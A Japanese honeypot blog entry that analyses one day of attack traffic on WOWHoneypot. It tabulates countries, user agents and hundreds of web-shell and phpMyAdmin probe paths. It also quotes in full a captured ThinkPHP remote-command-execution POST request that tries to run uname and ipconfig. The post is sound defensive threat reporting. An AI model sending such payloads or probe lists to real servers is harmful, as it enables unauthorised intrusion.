cute_otter’s blog

ハニーポットの観察日記を付けています

トップ > ハニーポット観察日記 > ハニーポット観察日記(2019/02/14)

ハニーポット観察日記(2019/02/14)

ハニーポット観察日記

WOWHoneypot

ハニーポット「WOWHoneypot」で2019/02/14 (木) 00:00~23:59 UTC(運用42日目)に取得したログの簡易分析です。

特徴

  • WebShellやphpMyAdminなどの探査を中心としたまとまったアクセスを3回観測しました。
  • 2019/01/18以来、27日ぶりにThinkPHPの脆弱性を利用した攻撃を2件観測しました。
  • 2019/01/30以来、15日ぶりにAdobe ColdFusionの探査を観測しました。
  • 5日連続でZGrabによるスキャンを観測しました。
  • 2019/02/05以来、9日ぶりにMASSCANによるスキャンを観測しました。

概況

  • 集計期間 : 2019/02/14 (木) 00:00~23:59 UTC
  • 総アクセス件数 : 752 件(前日比 +713 件)
  • ユニークIPアドレス件数 : 23 件 (前日比 +-0 件)
  • アクセス元の国数 : 12 カ国 (前日比 -2 カ国)

国別のアクセス件数

国別のアクセス件数は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. China 545 - 0 +545 -
2. Italy 185 13. 1 +184 -
3. United States 6 3. 4 +2 -
4. Brazil 4 2. 5 -1 -
5. France 3 - 0 +3 -
6. Poland 2 - 0 +2 -
7. Nigeria 2 - 0 +2 -
8. South Africa 1 - 0 +1 -
9. Japan 1 - 0 +1 -
10. India 1 4. 2 -1 -
11. Cambodia 1 12. 1 +-0 -
12. Bangladesh 1 6. 1 +-0 -

User-Agent

HTTPリクエストに含まれていたUser-Agentは以下の通りです。

順位 アクセス先 件数 前日の順位 前日の件数 件数差 備考
1. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 238 - 0 +238 WebShellの探査でのみ使用
2. Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 126 - 0 +126 主にWebShellやphpMyAdminの探査で使用
3. Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 77 - 0 +77 主にphpMyAdminの探査で使用
4. Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 62 - 0 +62 WebShellの探査でのみ使用
5. Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 61 - 0 +61 主にphpMyAdminの探査で使用
6. Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0) 58 - 0 +58 WebShellの探査でのみ使用
7. Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 43 - 0 +43 WebShellやphpMyAdminなどの探査で使用
8. Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 29 - 0 +29 主にWebShellやphpMyAdminの探査で使用
9. Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 10 - 0 +10 Tomcatの管理ページに対するログイン試行でのみ使用
10. Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 9 - 0 +9 Tomcatの管理ページに対するログイン試行でのみ使用
11. Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0) 9 - 0 +9 Tomcatの管理ページに対するログイン試行でのみ使用
12. 未設定 5 7. 1 +4 -
13. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 5 - 0 +5 -
14. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 4 3. 4 +-0 -
15. Mozilla/5.0 3 - 0 +3 WebDAVの探査でのみ使用
16. Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) 3 - 0 +3 主にThinkPHPの探査や脆弱性を利用した攻撃で使用
17. Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 2 4. 4 -2 -
18. Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 2 2. 7 -5 -
19. Mozilla/5.0 zgrab/0.x 1 5. 3 -2 ZGrabによるスキャン
20. Go-http-client/1.1 1 - 0 +1 ThinkPHPの脆弱性を利用した攻撃でのみ使用
21. HTTP Banner Detection (https://security.ipip.net) 1 - 0 +1 -
22. masscan/1.0 (https://github.com/robertdavidgraham/masscan) 1 - 0 +1 MASSCANによるスキャン
23. Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 1 - 0 +1 -
24. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 1 - 0 +1 -

アクセス先

  • WebShellやphpMyAdminなどの探査を中心としたまとまったアクセスを3回観測しました。
  • 2019/01/18以来、27日ぶりにThinkPHPの脆弱性を利用した攻撃を2件観測しました。
    • うち1件がPOSTメソッドを利用した攻撃で、POSTリクエストを利用した攻撃を初めて観測しました。
  • 2019/01/30以来、15日ぶりにAdobe ColdFusionの探査を観測しました。
  • 5日連続でZGrabによるスキャンを観測しました。
    • 件数は1件でした。
    • User-AgentはMozilla/5.0 zgrab/0.xでした。
    • 送信元IPアドレスは、University of Michigan(AS36375)に登録されたものでした。
  • 2019/02/05以来、9日ぶりにMASSCANによるスキャンを観測しました。
    • 件数は1件でした。
    • User-Agentはmasscan/1.0 (https://github.com/robertdavidgraham/masscan)でした。
    • 送信元IPアドレスは、DigitalOcean, LLC(AS14061)に登録されたものでした。

ThinkPHPの脆弱性を利用した攻撃

POSTメソッドを利用したThinkPHPの脆弱性を狙った攻撃を初めて観測しました。
unameコマンドとipconfigコマンドを実行しようとしていました。

POST /TP/public/index.php?s=captcha HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig

意図が不明なアクセス

1つのIPアドレスから、このパスだけにアクセスがありました。
これもWebShellの探査なのでしょうか。

GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Host: xxx.xxx.xxx.xxx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

アクセス先一覧

アクセス先の一覧は以下の通りです。

順位 備考 アクセス先 件数 前日の順位 前日の件数 件数差
1. Tomcatの管理ページに対するログイン試行 GET /manager/html HTTP/1.1 28 - 0 +28
2. トップページへのアクセス GET / HTTP/1.1 16 1. 21 -5
3. WebShellの探査 POST /qq.php HTTP/1.1 10 - 0 +10
4. WebShellの探査 GET /cmd.php HTTP/1.1 6 - 0 +6
5. WebShellの探査 POST /xx.php HTTP/1.1 6 - 0 +6
6. phpMyAdminの探査 GET /PMA/index.php HTTP/1.1 6 - 0 +6
7. phpMyAdminの探査 GET /web/phpMyAdmin/index.php HTTP/1.1 6 - 0 +6
8. phpMyAdminの探査 GET /admin/pma/index.php HTTP/1.1 6 - 0 +6
9. phpMyAdminの探査 GET /xampp/phpmyadmin/index.php HTTP/1.1 6 - 0 +6
10. phpMyAdminの探査 GET /tools/phpMyAdmin/index.php HTTP/1.1 6 - 0 +6
11. phpMyAdminの探査 GET /MyAdmin/index.php HTTP/1.1 6 - 0 +6
12. WebShellの探査 GET /shell.php HTTP/1.1 5 - 0 +5
13. WebShellの探査 POST /conflg.php HTTP/1.1 5 - 0 +5
14. WebShellの探査 POST /q.php HTTP/1.1 5 - 0 +5
15. WebShellの探査 POST /1.php HTTP/1.1 5 - 0 +5
16. phpMyAdminの探査 GET /admin/PMA/index.php HTTP/1.1 5 - 0 +5
17. phpMyAdminの探査 GET /www/phpMyAdmin/index.php HTTP/1.1 5 - 0 +5
18. phpMyAdminの探査 GET /typo3/phpmyadmin/index.php HTTP/1.1 5 - 0 +5
19. phpMyAdminの探査 GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1 5 - 0 +5
20. WebShellの探査 POST /test.php HTTP/1.1 4 - 0 +4
21. WebShellの探査 POST /confg.php HTTP/1.1 4 - 0 +4
22. WebShellの探査 POST /x.php HTTP/1.1 4 - 0 +4
23. phpMyAdminの探査 GET /pma/index.php HTTP/1.1 4 - 0 +4
24. phpMyAdminの探査 GET /admin/phpmyadmin/index.php HTTP/1.1 4 - 0 +4
25. phpMyAdminの探査 GET /admin/phpMyAdmin/index.php HTTP/1.1 4 - 0 +4
26. phpMyAdminの探査 GET /claroline/phpMyAdmin/index.php HTTP/1.1 4 - 0 +4
27. phpMyAdminの探査 GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1 4 - 0 +4
28. Microsoft IIS 6.0の脆弱性(CVE-2017-7269)を利用した攻撃 PROPFIND / HTTP/1.1 3 - 0 +3
29. WebDAVの探査 GET /webdav/ HTTP/1.1 3 - 0 +3
30. WebShellの探査 GET /java.php HTTP/1.1 3 - 0 +3
31. WebShellの探査 GET /_query.php HTTP/1.1 3 - 0 +3
32. WebShellの探査 GET /test.php HTTP/1.1 3 - 0 +3
33. WebShellの探査 GET /db_cts.php HTTP/1.1 3 - 0 +3
34. WebShellの探査 GET /logon.php HTTP/1.1 3 - 0 +3
35. WebShellの探査 GET /license.php HTTP/1.1 3 - 0 +3
36. WebShellの探査 GET /log.php HTTP/1.1 3 - 0 +3
37. WebShellの探査 GET /hell.php HTTP/1.1 3 - 0 +3
38. WebShellの探査 GET /pmd_online.php HTTP/1.1 3 - 0 +3
39. WebShellの探査 GET /x.php HTTP/1.1 3 - 0 +3
40. WebShellの探査 GET /htdocs.php HTTP/1.1 3 - 0 +3
41. WebShellの探査 GET /desktop.ini.php HTTP/1.1 3 - 0 +3
42. WebShellの探査 GET /cmdd.php HTTP/1.1 3 - 0 +3
43. WebShellの探査 GET /knal.php HTTP/1.1 3 - 0 +3
44. WebShellの探査 GET /appserv.php HTTP/1.1 3 - 0 +3
45. phpMyAdminの探査 GET /scripts/setup.php HTTP/1.1 3 - 0 +3
46. phpMyAdminの探査 GET /phpMyAdmin/scripts/setup.php HTTP/1.1 3 - 0 +3
47. phpMyAdminの探査 GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1 3 - 0 +3
48. Network Weathermapの探査 GET /plugins/weathermap/editor.php HTTP/1.1 3 - 0 +3
49. Network Weathermapの探査 GET /cacti/plugins/weathermap/editor.php HTTP/1.1 3 - 0 +3
50. WebShellの探査 POST /s.php HTTP/1.1 3 - 0 +3
51. WebShellの探査 POST /w.php HTTP/1.1 3 - 0 +3
52. WebShellの探査 POST /sheep.php HTTP/1.1 3 - 0 +3
53. WebShellの探査 POST /qaq.php HTTP/1.1 3 - 0 +3
54. WebShellの探査 POST /db_session.init.php HTTP/1.1 3 - 0 +3
55. WebShellの探査 POST /db__.init.php HTTP/1.1 3 - 0 +3
56. WebShellの探査 POST /m.php?pbid=open HTTP/1.1 3 - 0 +3
57. WebShellの探査 POST /db_dataml.php HTTP/1.1 3 - 0 +3
58. WebShellの探査 POST /db_desql.php HTTP/1.1 3 - 0 +3
59. WebShellの探査 POST /wshell.php HTTP/1.1 3 - 0 +3
60. WebShellの探査 POST /xshell.php HTTP/1.1 3 - 0 +3
61. WebShellの探査 POST /lindex.php HTTP/1.1 3 - 0 +3
62. WebShellの探査 POST /phpstudy.php HTTP/1.1 3 - 0 +3
63. WebShellの探査 POST /phpStudy.php HTTP/1.1 3 - 0 +3
64. WebShellの探査 POST /weixiao.php HTTP/1.1 3 - 0 +3
65. WebShellの探査 POST /feixiang.php HTTP/1.1 3 - 0 +3
66. WebShellの探査 POST /ak48.php HTTP/1.1 3 - 0 +3
67. WebShellの探査 POST /xiao.php HTTP/1.1 3 - 0 +3
68. WebShellの探査 POST /defect.php HTTP/1.1 3 - 0 +3
69. WebShellの探査 POST /webslee.php HTTP/1.1 3 - 0 +3
70. WebShellの探査 POST /pe.php HTTP/1.1 3 - 0 +3
71. WebShellの探査 POST /hm.php HTTP/1.1 3 - 0 +3
72. WebShellの探査 POST /cainiao.php HTTP/1.1 3 - 0 +3
73. WebShellの探査 POST /zuoshou.php HTTP/1.1 3 - 0 +3
74. WebShellの探査 POST /zuo.php HTTP/1.1 3 - 0 +3
75. WebShellの探査 POST /aotu.php HTTP/1.1 3 - 0 +3
76. WebShellの探査 POST /aotu7.php HTTP/1.1 3 - 0 +3
77. WebShellの探査 POST /cmd.php HTTP/1.1 3 - 0 +3
78. WebShellの探査 POST /system.php HTTP/1.1 3 - 0 +3
79. WebShellの探査 POST /l6.php HTTP/1.1 3 - 0 +3
80. WebShellの探査 POST /l8.php HTTP/1.1 3 - 0 +3
81. WebShellの探査 POST /56.php HTTP/1.1 3 - 0 +3
82. WebShellの探査 POST /mz.php HTTP/1.1 3 - 0 +3
83. WebShellの探査 POST /yumo.php HTTP/1.1 3 - 0 +3
84. WebShellの探査 POST /min.php HTTP/1.1 3 - 0 +3
85. WebShellの探査 POST /wan.php HTTP/1.1 3 - 0 +3
86. WebShellの探査 POST /wanan.php HTTP/1.1 3 - 0 +3
87. WebShellの探査 POST /ssaa.php HTTP/1.1 3 - 0 +3
88. WebShellの探査 POST /12.php HTTP/1.1 3 - 0 +3
89. WebShellの探査 POST /hh.php HTTP/1.1 3 - 0 +3
90. WebShellの探査 POST /ak.php HTTP/1.1 3 - 0 +3
91. WebShellの探査 POST /ip.php HTTP/1.1 3 - 0 +3
92. WebShellの探査 POST /infoo.php HTTP/1.1 3 - 0 +3
93. WebShellの探査 POST /qwe.php HTTP/1.1 3 - 0 +3
94. phpMyAdminの探査 GET /phpmyadmin/index.php HTTP/1.1 3 - 0 +3
95. phpMyAdminの探査 GET /PMA2/index.php HTTP/1.1 3 - 0 +3
96. phpMyAdminの探査 GET /pmamy2/index.php HTTP/1.1 3 - 0 +3
97. phpMyAdminの探査 GET /mysql/index.php HTTP/1.1 3 - 0 +3
98. phpMyAdminの探査 GET /admin/index.php HTTP/1.1 3 - 0 +3
99. phpMyAdminの探査 GET /admin/mysql/index.php HTTP/1.1 3 - 0 +3
100. phpMyAdminの探査 GET /admin/mysql2/index.php HTTP/1.1 3 - 0 +3
101. phpMyAdminの探査 GET /admin/phpmyadmin2/index.php HTTP/1.1 3 - 0 +3
102. phpMyAdminの探査 GET /mysqladmin/index.php HTTP/1.1 3 - 0 +3
103. phpMyAdminの探査 GET /mysql_admin/index.php HTTP/1.1 3 - 0 +3
104. phpMyAdminの探査 GET /phpadmin/index.php HTTP/1.1 3 - 0 +3
105. phpMyAdminの探査 GET /phpAdmin/index.php HTTP/1.1 3 - 0 +3
106. phpMyAdminの探査 GET /phpmyadmin0/index.php HTTP/1.1 3 - 0 +3
107. phpMyAdminの探査 GET /phpMyAdmin-4.4.0/index.php HTTP/1.1 3 - 0 +3
108. phpMyAdminの探査 GET /phpMyadmin_bak/index.php HTTP/1.1 3 - 0 +3
109. phpMyAdminの探査 GET /phpmyadmin-old/index.php HTTP/1.1 3 - 0 +3
110. phpMyAdminの探査 GET /phpMyAdminold/index.php HTTP/1.1 3 - 0 +3
111. phpMyAdminの探査 GET /phpMyAdmin.old/index.php HTTP/1.1 3 - 0 +3
112. phpMyAdminの探査 GET /pma-old/index.php HTTP/1.1 3 - 0 +3
113. phpMyAdminの探査 GET /phpma/index.php HTTP/1.1 3 - 0 +3
114. phpMyAdminの探査 GET /phpMyAbmin/index.php HTTP/1.1 3 - 0 +3
115. phpMyAdminの探査 GET /phpMyAdmin__/index.php HTTP/1.1 3 - 0 +3
116. phpMyAdminの探査 GET /phpMyAdmin+++---/index.php HTTP/1.1 3 - 0 +3
117. phpMyAdminの探査 GET /phpmyadm1n/index.php HTTP/1.1 3 - 0 +3
118. phpMyAdminの探査 GET /phpMyAdm1n/index.php HTTP/1.1 3 - 0 +3
119. phpMyAdminの探査 GET /shaAdmin/index.php HTTP/1.1 3 - 0 +3
120. phpMyAdminの探査 GET /phpMyadmi/index.php HTTP/1.1 3 - 0 +3
121. phpMyAdminの探査 GET /phpMyAdmion/index.php HTTP/1.1 3 - 0 +3
122. phpMyAdminの探査 GET /phpMyAdmin1/index.php HTTP/1.1 3 - 0 +3
123. phpMyAdminの探査 GET /phpMyAdmin123/index.php HTTP/1.1 3 - 0 +3
124. phpMyAdminの探査 GET /pwd/index.php HTTP/1.1 3 - 0 +3
125. phpMyAdminの探査 GET /phpMyAdmina/index.php HTTP/1.1 3 - 0 +3
126. phpMyAdminの探査 GET /phpMydmin/index.php HTTP/1.1 3 - 0 +3
127. phpMyAdminの探査 GET /program/index.php HTTP/1.1 3 - 0 +3
128. phpMyAdminの探査 GET /shopdb/index.php HTTP/1.1 3 - 0 +3
129. phpMyAdminの探査 GET /phppma/index.php HTTP/1.1 3 - 0 +3
130. phpMyAdminの探査 GET /phpmy/index.php HTTP/1.1 3 - 0 +3
131. phpMyAdminの探査 GET /mysql/admin/index.php HTTP/1.1 3 - 0 +3
132. phpMyAdminの探査 GET /mysql/dbadmin/index.php HTTP/1.1 3 - 0 +3
133. phpMyAdminの探査 GET /mysql/mysqlmanager/index.php HTTP/1.1 3 - 0 +3
134. WordPress用のPortable phpMyAdmin脆弱性(CVE-2012-5469)を利用した攻撃 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1 3 - 0 +3
135. WebShellの探査 GET /help.php HTTP/1.1 2 - 0 +2
136. phpMyAdminの探査 GET /db_pma.php HTTP/1.1 2 - 0 +2
137. WebShellの探査 GET /help-e.php HTTP/1.1 2 - 0 +2
138. WebShellの探査 GET /z.php HTTP/1.1 2 - 0 +2
139. WebShellの探査 GET /lala.php HTTP/1.1 2 - 0 +2
140. WebShellの探査 GET /lala-dpr.php HTTP/1.1 2 - 0 +2
141. WebShellの探査 GET /wpc.php HTTP/1.1 2 - 0 +2
142. WebShellの探査 GET /wpo.php HTTP/1.1 2 - 0 +2
143. WebShellの探査 GET /text.php HTTP/1.1 2 - 0 +2
144. WebShellの探査 GET /muhstik.php HTTP/1.1 2 - 0 +2
145. WebShellの探査 GET /muhstik2.php HTTP/1.1 2 - 0 +2
146. WebShellの探査 GET /muhstiks.php HTTP/1.1 2 - 0 +2
147. WebShellの探査 GET /muhstik-dpr.php HTTP/1.1 2 - 0 +2
148. WebShellの探査 GET /lol.php HTTP/1.1 2 - 0 +2
149. WebShellの探査 GET /uploader.php HTTP/1.1 2 - 0 +2
150. WebShellの探査 GET /cmv.php HTTP/1.1 2 - 0 +2
151. phpMyAdminの探査 GET /phpmyadmin/scripts/setup.php HTTP/1.1 2 - 0 +2
152. phpMyAdminの探査 GET /phpmyadmin/scripts/db___.init.php HTTP/1.1 2 - 0 +2
153. WebShellの探査 POST /wuwu11.php HTTP/1.1 2 - 0 +2
154. WebShellの探査 POST /xw.php HTTP/1.1 2 - 0 +2
155. WebShellの探査 POST /xw1.php HTTP/1.1 2 - 0 +2
156. WebShellの探査 POST /9678.php HTTP/1.1 2 - 0 +2
157. WebShellの探査 POST /wc.php HTTP/1.1 2 - 0 +2
158. WebShellの探査 POST /db.init.php HTTP/1.1 2 - 0 +2
159. WebShellの探査 POST /wp-admins.php HTTP/1.1 2 - 0 +2
160. WebShellの探査 POST /mx.php HTTP/1.1 2 - 0 +2
161. WebShellの探査 POST /ak47.php HTTP/1.1 2 - 0 +2
162. WebShellの探査 POST /yao.php HTTP/1.1 2 - 0 +2
163. WebShellの探査 POST /bak.php HTTP/1.1 2 - 0 +2
164. WebShellの探査 POST /l7.php HTTP/1.1 2 - 0 +2
165. WebShellの探査 POST /aw.php HTTP/1.1 2 - 0 +2
166. WebShellの探査 POST /1213.php HTTP/1.1 2 - 0 +2
167. WebShellの探査 POST /post.php HTTP/1.1 2 - 0 +2
168. WebShellの探査 POST /aaaa.php HTTP/1.1 2 - 0 +2
169. WebShellの探査 POST /h1.php HTTP/1.1 2 - 0 +2
170. WebShellの探査 POST /2.php HTTP/1.1 2 - 0 +2
171. WebShellの探査 POST /z.php HTTP/1.1 2 - 0 +2
172. WebShellの探査 POST /api.php HTTP/1.1 2 - 0 +2
173. WebShellの探査 POST /hello.php HTTP/1.1 2 - 0 +2
174. WebShellの探査 POST /lucky.php HTTP/1.1 2 - 0 +2
175. WebShellの探査 POST /MCLi.php HTTP/1.1 2 - 0 +2
176. WebShellの探査 POST /zxc1.php HTTP/1.1 2 - 0 +2
177. WebShellの探査 POST /test123.php HTTP/1.1 2 - 0 +2
178. WebShellの探査 POST /paylog.php HTTP/1.1 2 - 0 +2
179. phpMyAdminの探査 GET /index.php HTTP/1.1 2 - 0 +2
180. phpMyAdminの探査 GET /phpMyAdmin/index.php HTTP/1.1 2 - 0 +2
181. phpMyAdminの探査 GET /pmd/index.php HTTP/1.1 2 - 0 +2
182. phpMyAdminの探査 GET /pmamy/index.php HTTP/1.1 2 - 0 +2
183. phpMyAdminの探査 GET /db/index.php HTTP/1.1 2 - 0 +2
184. phpMyAdminの探査 GET /dbadmin/index.php HTTP/1.1 2 - 0 +2
185. phpMyAdminの探査 GET /mysql-admin/index.php HTTP/1.1 2 - 0 +2
186. phpMyAdminの探査 GET /phpmyadmin1/index.php HTTP/1.1 2 - 0 +2
187. phpMyAdminの探査 GET /phpmyadmin2/index.php HTTP/1.1 2 - 0 +2
188. phpMyAdminの探査 GET /myadmin/index.php HTTP/1.1 2 - 0 +2
189. phpMyAdminの探査 GET /myadmin2/index.php HTTP/1.1 2 - 0 +2
190. phpMyAdminの探査 GET /v/index.php HTTP/1.1 2 - 0 +2
191. WebShellの探査 GET /cmx.php HTTP/1.1 2 - 0 +2
192. トップページへのアクセス GET / HTTP/1.0 2 - 0 +2
193. Adobe ColdFusionの探査 GET /CFIDE/administrator/ HTTP/1.1 2 - 0 +2
194. WordPressのコンフィグファイルの探査 GET /wp-config.php HTTP/1.1 1 - 0 +1
195. WebShellの探査 POST /3.php HTTP/1.1 1 - 0 +1
196. WebShellの探査 POST /phpinfi.php HTTP/1.1 1 - 0 +1
197. WebShellの探査 POST /9510.php HTTP/1.1 1 - 0 +1
198. WebShellの探査 POST /python.php HTTP/1.1 1 - 0 +1
199. WebShellの探査 POST /default.php HTTP/1.1 1 - 0 +1
200. WebShellの探査 POST /sean.php HTTP/1.1 1 - 0 +1
201. WebShellの探査 POST /app.php HTTP/1.1 1 - 0 +1
202. WebShellの探査 POST /help.php HTTP/1.1 1 - 0 +1
203. WebShellの探査 POST /tiandi.php HTTP/1.1 1 - 0 +1
204. WebShellの探査 POST /miao.php HTTP/1.1 1 - 0 +1
205. WebShellの探査 POST /xz.php HTTP/1.1 1 - 0 +1
206. WebShellの探査 POST /linuxse.php HTTP/1.1 1 - 0 +1
207. WebShellの探査 POST /zuoindex.php HTTP/1.1 1 - 0 +1
208. WebShellの探査 POST /zshmindex.php HTTP/1.1 1 - 0 +1
209. WebShellの探査 POST /tomcat.php HTTP/1.1 1 - 0 +1
210. WebShellの探査 POST /ceshi.php HTTP/1.1 1 - 0 +1
211. WebShellの探査 POST /1hou.php HTTP/1.1 1 - 0 +1
212. WebShellの探査 POST /ou2.php HTTP/1.1 1 - 0 +1
213. WebShellの探査 POST /zuos.php HTTP/1.1 1 - 0 +1
214. WebShellの探査 POST /zuoss.php HTTP/1.1 1 - 0 +1
215. WebShellの探査 POST /zuoshss.php HTTP/1.1 1 - 0 +1
216. WebShellの探査 POST /boots.php HTTP/1.1 1 - 0 +1
217. WebShellの探査 POST /she.php HTTP/1.1 1 - 0 +1
218. WebShellの探査 POST /qw.php HTTP/1.1 1 - 0 +1
219. WebShellの探査 POST /caonma.php HTTP/1.1 1 - 0 +1
220. WebShellの探査 POST /wcp.php HTTP/1.1 1 - 0 +1
221. WebShellの探査 POST /u.php HTTP/1.1 1 - 0 +1
222. WebShellの探査 POST /uuu.php HTTP/1.1 1 - 0 +1
223. WebShellの探査 POST /sss.php HTTP/1.1 1 - 0 +1
224. WebShellの探査 POST /core.php HTTP/1.1 1 - 0 +1
225. WebShellの探査 POST /qaz.php HTTP/1.1 1 - 0 +1
226. WebShellの探査 POST /sha.php HTTP/1.1 1 - 0 +1
227. WebShellの探査 POST /ppx.php HTTP/1.1 1 - 0 +1
228. WebShellの探査 POST /conf1g.php HTTP/1.1 1 - 0 +1
229. WebShellの探査 POST /ver.php HTTP/1.1 1 - 0 +1
230. WebShellの探査 POST /hack.php HTTP/1.1 1 - 0 +1
231. WebShellの探査 POST /qa.php HTTP/1.1 1 - 0 +1
232. WebShellの探査 POST /Ss.php HTTP/1.1 1 - 0 +1
233. WebShellの探査 POST /xxx.php HTTP/1.1 1 - 0 +1
234. WebShellの探査 POST /92.php HTTP/1.1 1 - 0 +1
235. WebShellの探査 POST /dexgp.php HTTP/1.1 1 - 0 +1
236. WebShellの探査 POST /nuoxi.php HTTP/1.1 1 - 0 +1
237. WebShellの探査 POST /godkey.php HTTP/1.1 1 - 0 +1
238. WebShellの探査 POST /okokok.php HTTP/1.1 1 - 0 +1
239. WebShellの探査 POST /erwa.php HTTP/1.1 1 - 0 +1
240. WebShellの探査 POST /pma.php HTTP/1.1 1 - 0 +1
241. WebShellの探査 POST /ruyi.php HTTP/1.1 1 - 0 +1
242. WebShellの探査 POST /51314.php HTTP/1.1 1 - 0 +1
243. WebShellの探査 POST /5201314.php HTTP/1.1 1 - 0 +1
244. WebShellの探査 POST /fusheng.php HTTP/1.1 1 - 0 +1
245. WebShellの探査 POST /general.php HTTP/1.1 1 - 0 +1
246. WebShellの探査 POST /repeat.php HTTP/1.1 1 - 0 +1
247. WebShellの探査 POST /ldw.php HTTP/1.1 1 - 0 +1
248. WebShellの探査 POST /s1.php HTTP/1.1 1 - 0 +1
249. WebShellの探査 POST /xiaodai.php HTTP/1.1 1 - 0 +1
250. WebShellの探査 POST /admn.php HTTP/1.1 1 - 0 +1
251. WebShellの探査 POST /hell.php HTTP/1.1 1 - 0 +1
252. WebShellの探査 POST /xp.php HTTP/1.1 1 - 0 +1
253. WebShellの探査 POST /p.php HTTP/1.1 1 - 0 +1
254. WebShellの探査 POST /a.php HTTP/1.1 1 - 0 +1
255. WebShellの探査 POST /m.php HTTP/1.1 1 - 0 +1
256. WebShellの探査 POST /conf.php HTTP/1.1 1 - 0 +1
257. WebShellの探査 POST /123.php HTTP/1.1 1 - 0 +1
258. WebShellの探査 POST /HX.php HTTP/1.1 1 - 0 +1
259. WebShellの探査 POST /666.php HTTP/1.1 1 - 0 +1
260. WebShellの探査 POST /777.php HTTP/1.1 1 - 0 +1
261. WebShellの探査 POST /qwq.php HTTP/1.1 1 - 0 +1
262. WebShellの探査 POST /qwqw.php HTTP/1.1 1 - 0 +1
263. WebShellの探査 POST /.php HTTP/1.1 1 - 0 +1
264. WebShellの探査 POST /infos.php HTTP/1.1 1 - 0 +1
265. WebShellの探査 POST /htfr.php HTTP/1.1 1 - 0 +1
266. WebShellの探査 POST /zzk.php HTTP/1.1 1 - 0 +1
267. WebShellの探査 POST /toor.php HTTP/1.1 1 - 0 +1
268. WebShellの探査 POST /uu.php HTTP/1.1 1 - 0 +1
269. WebShellの探査 POST /aa.php HTTP/1.1 1 - 0 +1
270. WebShellの探査 POST /wb.php HTTP/1.1 1 - 0 +1
271. WebShellの探査 POST /yj.php HTTP/1.1 1 - 0 +1
272. WebShellの探査 POST /7.php HTTP/1.1 1 - 0 +1
273. WebShellの探査 POST /xiaoma.php HTTP/1.1 1 - 0 +1
274. WebShellの探査 POST /xiaomae.php HTTP/1.1 1 - 0 +1
275. WebShellの探査 POST /xiaomar.php HTTP/1.1 1 - 0 +1
276. WebShellの探査 POST /data.php HTTP/1.1 1 - 0 +1
277. WebShellの探査 POST /log.php HTTP/1.1 1 - 0 +1
278. WebShellの探査 POST /fack.php HTTP/1.1 1 - 0 +1
279. WebShellの探査 POST /angge.php HTTP/1.1 1 - 0 +1
280. WebShellの探査 POST /cxfm666.php HTTP/1.1 1 - 0 +1
281. WebShellの探査 POST /db.php HTTP/1.1 1 - 0 +1
282. WebShellの探査 POST /hacly.php HTTP/1.1 1 - 0 +1
283. WebShellの探査 POST /xiaomo.php HTTP/1.1 1 - 0 +1
284. WebShellの探査 POST /xiaoyu.php HTTP/1.1 1 - 0 +1
285. WebShellの探査 POST /xiaohei.php HTTP/1.1 1 - 0 +1
286. WebShellの探査 POST /j.php HTTP/1.1 1 - 0 +1
287. WebShellの探査 POST /qq5262.php HTTP/1.1 1 - 0 +1
288. WebShellの探査 POST /lost.php HTTP/1.1 1 - 0 +1
289. WebShellの探査 POST /php.php HTTP/1.1 1 - 0 +1
290. WebShellの探査 POST /win.php HTTP/1.1 1 - 0 +1
291. WebShellの探査 POST /win1.php HTTP/1.1 1 - 0 +1
292. WebShellの探査 POST /linux.php HTTP/1.1 1 - 0 +1
293. WebShellの探査 POST /linux1.php HTTP/1.1 1 - 0 +1
294. WebShellの探査 POST /cc.php HTTP/1.1 1 - 0 +1
295. WebShellの探査 POST /lanke.php HTTP/1.1 1 - 0 +1
296. WebShellの探査 POST /neko.php HTTP/1.1 1 - 0 +1
297. WebShellの探査 POST /super.php HTTP/1.1 1 - 0 +1
298. WebShellの探査 POST /cere.php HTTP/1.1 1 - 0 +1
